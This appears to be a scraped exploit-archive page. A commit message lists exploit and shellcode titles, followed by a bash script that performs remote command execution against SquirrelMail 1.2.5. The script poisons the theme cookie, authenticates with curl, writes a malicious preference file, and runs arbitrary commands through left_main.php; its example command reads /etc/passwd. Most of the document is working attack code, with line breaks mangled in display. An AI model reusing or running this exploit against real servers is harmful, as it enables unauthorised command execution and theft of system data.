880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
66 lines
No EOL
2.2 KiB
Bash
Executable file
66 lines
No EOL
2.2 KiB
Bash
Executable file
source: https://www.securityfocus.com/bid/4385/info
|
|
|
|
SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. SquirrelMail allows for extended functionality through a plugin system.
|
|
|
|
A vulnerability has been reported in some versions of SquirrelMail. Reportedly, it is possible to corrupt the variable used to select a user's theme, and force the vulnerable script to execute arbitrary commands.
|
|
|
|
#!/bin/bash
|
|
#
|
|
# squirrelmail-1.2.5 remote execution by pokleyzz
|
|
http://www.inetd-secure.net
|
|
#
|
|
# usage : ./sq125x themecount username password
|
|
url command
|
|
# example : ./sq125x 2 pokley 123456
|
|
http://mail.pokleyzz.my/mail "cat /etc/passwd"
|
|
#
|
|
# curl can be found at http://curl.haxx.se/libcurl/
|
|
#
|
|
|
|
export
|
|
PATH="/usr/bin:/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/l
|
|
ocal/sbin"
|
|
export CURL="/usr/bin/curl"
|
|
export USERNAME="$2"
|
|
export PASSWORD="$3"
|
|
export THEME_COUNT="$1"
|
|
export URL="$4"
|
|
export COMMAND=`echo $5|sed 's/\ /%20/g' -`
|
|
export TMPFILE="header.tmp"
|
|
export THEME="theme[${THEME_COUNT}][PATH]
|
|
=../data/${USERNAME}.pref; theme
|
|
[${THEME_COUNT}][NAME]=testing"
|
|
|
|
#step 1
|
|
sed "s/pokley/"$USERNAME"/g" post.txt >lame.txt
|
|
/bin/rm -rf ${TMPFILE}
|
|
$CURL -b "$THEME" -d
|
|
login_username=${USERNAME} -d
|
|
secretkey=${PASSWORD} -d
|
|
js_autodetect_results=0 -d just_logged_in=1 -D
|
|
${TMPFILE} ${URL}/src/redirect.php
|
|
export COOKIES=`cat ${TMPFILE} |grep Set-
|
|
Cookie|awk {'print $2'}|while read data;do printf '%b'
|
|
$data;done`
|
|
export COOKIES="${COOKIES} ${THEME}"
|
|
$CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --
|
|
silent ${URL}/src/options.php
|
|
|
|
#step 2
|
|
sleep 5s
|
|
$CURL -b "$THEME" -d
|
|
login_username=${USERNAME} -d
|
|
secretkey=${PASSWORD} -d
|
|
js_autodetect_results=0 -d just_logged_in=1 -D
|
|
${TMPFILE} ${URL}/src/redirect.php
|
|
export COOKIES=`cat ${TMPFILE} |grep Set-
|
|
Cookie|awk {'print $2'}|while read data;do printf '%b'
|
|
$data;done`
|
|
export COOKIES="${COOKIES} ${THEME}"
|
|
$CURL -b "$COOKIES" -d @lame.txt -o /tmp/.tmp --
|
|
silent ${URL}/src/options.php
|
|
$CURL -b "$COOKIES" ${URL}/src/left_main.php?
|
|
cmdd=${COMMAND}
|
|
$CURL -b "$COOKIES" -o /tmp/.tmp --silent
|
|
${URL}/src/signout.php
|
|
rm -rf lame.txt /tmp/.tmp |